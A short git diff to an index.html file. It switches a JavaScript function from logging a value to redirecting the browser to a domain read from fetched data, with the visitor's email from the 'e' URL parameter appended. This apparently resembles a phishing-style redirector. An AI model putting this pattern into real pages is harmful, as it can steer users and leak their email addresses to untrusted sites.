--- a/index.html
+++ b/index.html
@@ -74,7 +74,7 @@ function filter(data,param) {
 let domain;
     domain = data.domain_name;
 	
-var url = window.location.href;
+// var url = window.location.href;
 const urlParams = new URLSearchParams(window.location.search);    
 const email = urlParams.get('e');
 // let Url = {
@@ -91,9 +91,8 @@ const email = urlParams.get('e');
 // };
 
 
-// window.location.href = domain+email;
-const result = domain+email;
-console.log('result',result);
+
+window.location.href = domain+email;
 }
 
 setTimeout( function(){
